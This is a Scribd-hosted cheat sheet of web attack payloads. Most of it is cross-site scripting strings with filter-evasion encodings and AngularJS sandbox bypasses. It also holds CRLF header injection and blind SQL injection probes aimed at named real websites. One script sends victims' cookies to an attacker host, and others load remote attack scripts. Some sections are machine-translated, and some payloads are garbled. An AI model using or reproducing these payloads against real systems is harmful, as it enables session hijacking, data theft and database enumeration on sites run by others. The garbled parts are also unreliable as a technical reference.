Scribd
Upload
649 views21 pages

XSS Payloads

The document contains examples of cross-site scripting (XSS) vulnerabilities and techniques. It provides over 40 examples of XSS payloads that could be used to inject malicious scripts into a vulnerable web application. The payloads use techniques like encoding, embedding scripts and tags, and exploiting vulnerabilities in image, style, and script tags to execute JavaScript and steal data like cookies or make unauthorized modifications.

Uploaded by

RVR00T
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
649 views21 pages

XSS Payloads

The document contains examples of cross-site scripting (XSS) vulnerabilities and techniques. It provides over 40 examples of XSS payloads that could be used to inject malicious scripts into a vulnerable web application. The payloads use techniques like encoding, embedding scripts and tags, and exploiting vulnerabilities in image, style, and script tags to execute JavaScript and steal data like cookies or make unauthorized modifications.

Uploaded by

RVR00T
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 21

" onEvent=@REQUESTID@ -- qualys

" onEvent=X148805780Y1Z -- qualys

>'>"><script>alert();</script>

>'>"><svg/onload=alert(document.domain)>

<script>prompt(1)</script>

<script>confirm(1)</script>

"><img src=x onerror='alert(xzz)'>

"><img src=x onerror='alert(document.domain)'>

' "/><img src= x onerror='alert(document.domain)'>

' "/><img src= x onerror=prompt(/xss/)>

"><img src=x onerror=prompt(/xss by me/)>

<img src='test' onmouseover='alert(2)'>

<img src="x" alt="'' ">

'"--></style></scRipt><scRipt>alert('XSSPOS ED')</scRipt>

/><script>window.alert('XSS Vulnerable');</script>

<script>window.alert('XSS Vulnerable');</script>

#<script>alert(document.domain)</script> dom

<script>alert(document.URL)</script>

<iframe src="http://www.cnn.com"></iframe>

"><img src=x onerror=alert(1)> -stored xss

<script>alert(1)</script>
json attibutes

if style sheet allowed this payload is used

"--></style></script><script>alert("XSS")</script>

-------

Fiter xss

/?#&;:="%<>@[\\]^`{|}

'';!--"<XSS>=&{()}

Fitered:

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7
2%69%70%74%3e

<ScRipt>ALeRt("hi");</sCRipT>

vulnerable"%3B%20alert(%27Mondays%27)%3B%20"

json attibutes

"};alert(23);a={"a":

html tags

css expression : “x:expr/**/ession(alert(1))”

</script><script>alert("XSS")</script>
<body onload=prompt("justqdjing")>

>'>"><svg/onload=alert(document.domain)>

"/><svg onload=prompt(document.domain)>

"></script><svg/onload=alert("XSS")>-- url

https://www.zopim.com/#1=1&__zopim_widget_proxy=1.zopim.com/s/W/xdds/PIJ4+155G8p7LL3w/c/
1444997086678%22%3E%3C/script%3E%3Csvg/onload=alert%28%22XSS%22%29%3E

' onerror='alert('XSS')' a='.jpg

'|alert('XSS')|'

%27|alert%28%27XSS%27%29|%27

%2527%257Calert%2528%2527XSS%2527%2529%257C%2527

';alert(/xss/)///

';alert(/xss/)///';alert(1)//";alert(2)///";alert(3)//--
></SCRIPT>">'><SCRIPT>alert(/xss/)</SCRIPT>=&{}");}alert(6);functions+xss(){//

------

javascript:alert(1);///// -outhn

javascript:alert(1);

javascript:alert(document.domain);

<ScRiPt%20>prompt(document.domain)</ScRiPt> -- naem

onmouseover=prompt(document.domain)-- if html encoded by form

http://www.aol.com/?mol=acm50overlaynl031213a8345 …<%2fscript><script>prompt(/Osama
Mahmood/)<%2fscript>22606c823c6&icid=acm50newslettersignup&shw=1
<SCRIPT>

Document.write('<img
src=\'http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>');

</SCRIPT>

------

<style><img src='</style><img src=x onerror=alert("document.cookie")//'>

'<script>alert('xss message')</script>

"><script>alert('xss message')</script>

>/"><script>alert('xss message')</script>

"><script>alert(document.cookie)</script>

"><script>alert(document.cookie)</script>/><':

;<><script></script>/<script>alert('0')</script>

</script><script>prompt("test")</script>

"><script>alert(document.location)</script><"

--------------------------------------------------

<b><h1>Html Injection

#5 Inject fake <meta>

<a href="example.com">asdf</a>

</title><meta http-equiv='content-type' content='text/html;charset=utf-7'>

-----------------------------------------

1:- ';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//";


alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>
2:- "><img src=x onerror=prompt(1)>

3:- "><script>alert(“XSS”);</script>

4:- x'\"></script><img src=x onerror=alert(1)>

5:- "><svg onload="prompt(/xss/)"></svg>

" onmouseover="alert(1)

6:- %22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

7:- %22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E

8:- %22%3B%3E%3Cscript%3Ealert(String.fromCharCode(73,69,82,82,69%3B%3C%2Fscript%3E

9:- %22%3E%3Cimg%20src=k%20onerror=alert%28%22XSS%22%29%20/%3E

10:- "><font size=70 color=red>xss by ashish pathak

"()%26%251

-------------------

append <xss> ---- in any userinput box like recovery mail


--------------------

https://www.poodlescan.com/

--------------------

callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)//

javascript:alert(document.cookie);//

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<a onmouseover="alert(document.cookie)">xxs link</a>

<a onmouseover=alert(document.cookie)>xxs link</a>

< is encoded as: &lt;

> is encoded as: &gt;

CODE :

%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

&lt;script&gt;alert("XSS")&lt;/script&gt;
&lt;script&gt;alert("XSS")&lt;/script&gt;

&lt;script&gt;alert(%34XSS%34)&lt;/script&gt;

&lt;script&gt;alert('XSS')&lt;/script&gt;

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_onerror_and_javascript_aler
t_encode

http://webtechhut.blogspot.in/2014/12/cross-site-scripting-in-two-subdomain.html

<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>

<IMG%20SRC=axc%20onerror=alert(1)>

CRLF

http://www.yoursite.net/file?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200


OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EHacker Content%3C/html%3E

"37d8600defb103276f30e279f5fdcb6d %0D%0ASet-Cookie:%20Attacker=Attacker;

MOre advance
XSS called CSS (Cross-Site Script), cross-site scripting attacks. Malicious attacker to insert malicious Web
page using html code

When users browse the page , the Web embedded inside html code will be executed , so as to achieve a
particular purpose malicious users.

XSS divided into two categories :

One is to attack from the inside , mainly refers to the use of the program 's own vulnerabilities , cross-
site constructed statements, such as : dvbbs of showerror.asp existing cross-site vulnerabilities.

The other is attacked from outside, mainly referring to construct their own XSS Cross Site pages or find
loopholes than there are non- target cross-site vulnerabilities page.

For example, when we want to infiltrate a site, we have constructed a cross-site vulnerabilities pages ,
and then construct cross-site statement , through a combination of other techniques , such as social
engineering , etc., to deceive the target server administrator to open

( 1 ) common XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT>

(2) IMG tag XSS use JavaScript commands

<SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT>

(3) IMG tag without a semicolon without quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tags are not case sensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML coding ( must have a semicolon )

<IMG SRC=javascript:alert("XSS")>

( 6 ) fix defects IMG tag

<IMG """> <SCRIPT> Alert ("XSS") </ SCRIPT> ">

(7) formCharCode pins ( calculator )

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Unicode UTF-8 encoding of ( calculator )

<IMG SRC=jav..??..S')>

Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator )

<IMG SRC=jav..??..S')>

( 10 ) hexadecimal encoding is no semicolon ( Calculator )


<IMG SRC=java..??..XSS')>

( 11 ) embedded tags , separated from the Javascript

<IMG SRC="jav ascript:alert('XSS');">

( 12 ) embedded coded labels will separate Javascript

<IMG SRC="jav ascript:alert('XSS');">

( 13 ) embedded newline

<IMG SRC = "jav ascript: alert ('XSS

');">

( 14 ) embedded carriage returns

<IMG SRC="jav ascript:alert('XSS');">

( 15 ) embedded multi -line injection of JavaScript, which is an extreme example XSS

<IMG SRC="javascript:alert('XSS')">

( 16 ) to overcome the limitations of characters ( with the required page )

<script> z = 'document.' </ script>

<script> z = z + 'write ("' </ script>

<script> z = z + '<script' </ script>

<script> z = z + 'src = ht' </ script>

<script> z = z + 'tp :/ / ww' </ script>

<script> z = z + 'w.zoyzo' </ script>

<script> z = z + '. cn / 1.' </ script>

<script> z = z + 'js> </ sc' </ script>

<script> z = z + 'ript> ")' </ script>

<script> eval_r (z) </ script>

( 17 ) null character

perl-e 'print "<IMG SRC=javascript:alert("XSS")>";'> out

( 18 ) 2 null characters , null characters in the country and basically had no effect because there is no
place to use

perl-e 'print "<SCRIPT> alert (" XSS ") </ SCRIPT>";'> out

(19) IMG tag and meta before Spaces


<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"> </ SCRIPT>

(21) Non-alpha-non-digit XSS to 2

<BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"> </ SCRIPT>

( 23 ) double open parenthesis

<< SCRIPT> alert ("XSS") ;/ / << / SCRIPT>

( 24 ) No end script tags ( Firefox and other browsers only )

<SCRIPT SRC = http://3w.org/XSS/xss.js? <B>

( 25 ) No end script tags 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

( 26 ) half-open HTML / JavaScript XSS

<IMG SRC = "javascript: alert ('XSS')"

( 27 ) double open-angle brackets

<iframe src=http://3w.org/XSS.html>

( 28 ) No single quotes double quotes semicolons

<SCRIPT> A = / XSS /

alert (a.source) </ SCRIPT>

( 29 ) escape filtration JavaScript

Code:

"; alert ('XSS') ;/ /

( 30 ) End Title Label

</ TITLE> <SCRIPT> alert ("XSS"); </ SCRIPT>

(31) Input Image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

( 38 ) remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image ( list type )

<STYLE> Li {list-style-image: url ("javascript: alert ('XSS')");} </ STYLE> <UL> <LI> XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'> </ STYLE> <UL> <LI> XSS

design issue 360e0e url('http://www.google.com')

SQL
'%2 and if(substring(user(),1,1)='c',SLEEP(3),1)+' - true (sleeps 3 sec)

cfire_sid=42767ca19a891c1077f377f6e96120b2'%2 and if(substring(user(),2,1)='x',SLEEP(3),1)+'

----------

cfire_uid=1491167763614215' or substring(version(),1,1)=5-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(version(),1,1)=4-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(version(),1,1)=3-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(user(),1,1)='c'-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(user(),2,1)='f'-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or substring(user(),1,1)='x'-- ; - false (302 Found)

cfire_uid=1491167763614215' or substring(user(),2,1)='x'-- ; - false (302 Found)

cfire_uid=1491167763614215' or (select(1))=1-- ; - true (500 Internal Server Error)

cfire_uid=1491167763614215' or (select(1))=2-- ; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d5--%20; - true (500 Internal Server


Error)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d4--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(version(),1,1)%3d3--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(user(),1,1)%3d'c'--%20; - true (500 Internal Server


Error)

cfire_uid=1491167763614215'%20or%20substring(user(),2,1)%3d'f'--%20; - true (500 Internal Server


Error)

cfire_uid=1491167763614215'%20or%20substring(user(),1,1)%3d'x'--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20substring(user(),2,1)%3d'x'--%20; - false (302 Found)

cfire_uid=1491167763614215'%20or%20(select(1))%3d1--%20; - true (500 Internal Server Error)


cfire_uid=1491167763614215'%20or%20(select(1))%3d2--%20; - false (302 Found)

---------------------------------------

Referer: https://parapa.mail.ru/forums/showthread.php?t=106825&page=74&p=3522012

Cookie: popup_promo_8=1; PHPSESSID=5qdrcd3qddl28cj3uckcb5jgqrd3;


parapa_sid=6a86c907dc5af9e51675dd9af28a26d2;
parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)
))a)--%20;

parapa_sid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),1,1)='p',sleep(2000
0000),1)))a)--%20 - true (sleeps 5 sec)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),2,1)='a',sleep(5),1))
)a)--%20 - true (sleeps 5 sec)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),3,1)='x',sleep(5),1))
)a)--%20 - false (quick response)

parapa_uid=4836325'%20and%20(select%20*%20from%20(select(if(substring(user(),4,1)='z',sleep(5),1))
)a)--%20 - false (quick response)

------------------------------------------

Blind test

PoC (wait a while):


http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&total_entries=2&sort_
by=id&order=asc&client='+or+benchmark(10000000,md5(1))='

PoC (no wait):


http://www.bookfresh.com/reservations?page=1&per_page=10&total_pages=1&total_entries=2&sort_
by=id&order=asc&client='+or+benchmark(0,md5(1))='
----------------------------------------
angular JS

<div ng-app>

{{

'a'.constructor.fromCharCode=[].join;

'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';

}}

</div>

<div ng-app>

{{
'a'.constructor.prototype.charAt=[].join;

$eval('x=alert(1)')+''

}}

</div>

<script>

onload=function(){

document.write(String.fromCharCode(97));

</script>

List of Sandbox bypasses

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Cure53)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,
0,'alert(1)')()}}

1.2.2 - 1.2.5

Gareth Heyes (PortSwigger)

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert
(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18

Jan Horn (Cure53)

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23

Mathias Karlsson

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toStrin
g.constructor);}}

1.2.24 - 1.2.29

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002e
x=1)')+eval(y)+\"'");}}

1.3.0

Gábor Molnár (Google)

{{!ready && (ready = true) && (

!call

? $$watchers[0].get(toString.constructor.prototype)

: (a = apply) &&

(apply = constructor) &&

(valueOf = call) &&

(''+''.toString(

'F = Function.prototype;' +

'F.apply = F.a;' +

'delete F.a;' +

'delete F.valueOf;' +

'alert(1);'

))

);}}

1.3.1 - 1.3.2
Gareth Heyes (PortSwigger)

{{

{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=''.valueOf;

$eval('x=alert(1)//');

}}

1.3.3 - 1.3.18

Gareth Heyes (PortSwigger)

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=[].join;

$eval('x=alert(1)//'); }}

1.3.19

Gareth Heyes (PortSwigger)

{{

'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;

$eval('x=alert(1)//');

}}

1.3.20

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

Gareth Heyes (PortSwigger)

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
tIME PAYLOAD

%22%20onmouseover%3dalert%281%29%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bhe
ight%3a100%25%3btop%3a0%3bleft%3a0%3b%20d7451

Basic XSS Payloads:

<script>alert(“Xss-By-Muhaddi”)</script>

“><script>alert(“Xss-By-Muhaddi”)</script>

“><script>alert(/Xss-By-Muhaddi/)</script>

When inside Script tag:

</script><script>alert(“Xss-By-Muhaddi”)</script>

“);alert(“Xss-By-Muhaddi”);//

Bypassing Tag Restriction With Toggle Case:

“><iFrAmE/src=jAvAscrIpT:alert(/Xss-By-Muhaddi/)>

“><ScRiPt>alert(“Xss-By-Muhaddi”)</sCrIpT>

XSS Using Image & HTML tags:

Works Only On Chrome

“><detials ontoggle=confirm(0)>

“><IMG SRC=x onerror=javascript:alert(&quot;Xss-By-Muhaddi&quot;)>


“><img onmouseover=alert(“Xss-By-Muhaddi”)>

“><test onclick=alert(/Xss-By-Muhaddi/)>Click Me</test>

“><a href=javascript:alert(/Xss-By-Muhaddi/)Click Me</a>

“><h1 onmouseover=alert(“test”)>Hover Me</h1>

“><svg/onload=prompt(“Xss-By-Muhaddi”)>

“><body/onload=alert(“Xss-By-Muhaddi”)>

Style Context:

Only Works On Older Versions of Internet Explorer, IE7, IE8

If Input Is Inside <Style> Tag:

body{xss:expression(alert(“Xss-By-Muhaddi”))}

If Input Is In Style=” ” Attribute:

xss:expression(alert(/Xss-By-Muhaddi/)

Bypass Script Tag Filtering:

<<SCRIPT>alert(“Xss-By-Muhaddi”);//<</SCRIPT>

%253script%253ealert(/Xss-By-Muhaddi/)%253c/script%253e

“><s”%2b”cript>alert(/Xss-By-Muhaddi/)</script>

foo<script>alert(/Xss-By-Muhaddi/)</script>

<scr<script>ipt>alert(/Xss-By-Muhaddi/)</scr</script>ipt>

Advance Payloads:

Hex Encoding
“><IMG SRC=x
onerror=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x
72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

“><a XSS-test href=jAvAsCrIpT&colon;prompt&lpar;/Xss-By-Muhaddi/&rpar;>ClickMe

“><h1/onclick=a\u006cer\u0074(/Xss-By-Muhaddi/)>Click Me</h1>

“><a id=”a”href=javascript&colon;a\u006cer\u0074&lpar;/Xss-By-Muhaddi/&rpar; id=”xss-test”>Click


me</a>#a <

<a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>ClickMe

Some Alternative Useful Keywords:

Alert = a\u006cer\u0074

Prompt = p\u0072om\u0070\u0074

Confirm = co\u006efir\u006d

Javascript = j&#x00041vascr&#x00069pt

: = &colon;

( = &lpar;

) = &rpar;

Using alert(/Xss/) in a link = alert%28 /Xss/%29 example: <a href=”javascript:alert%28 /Xss/%29?>Click


Me

Base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+

You might also like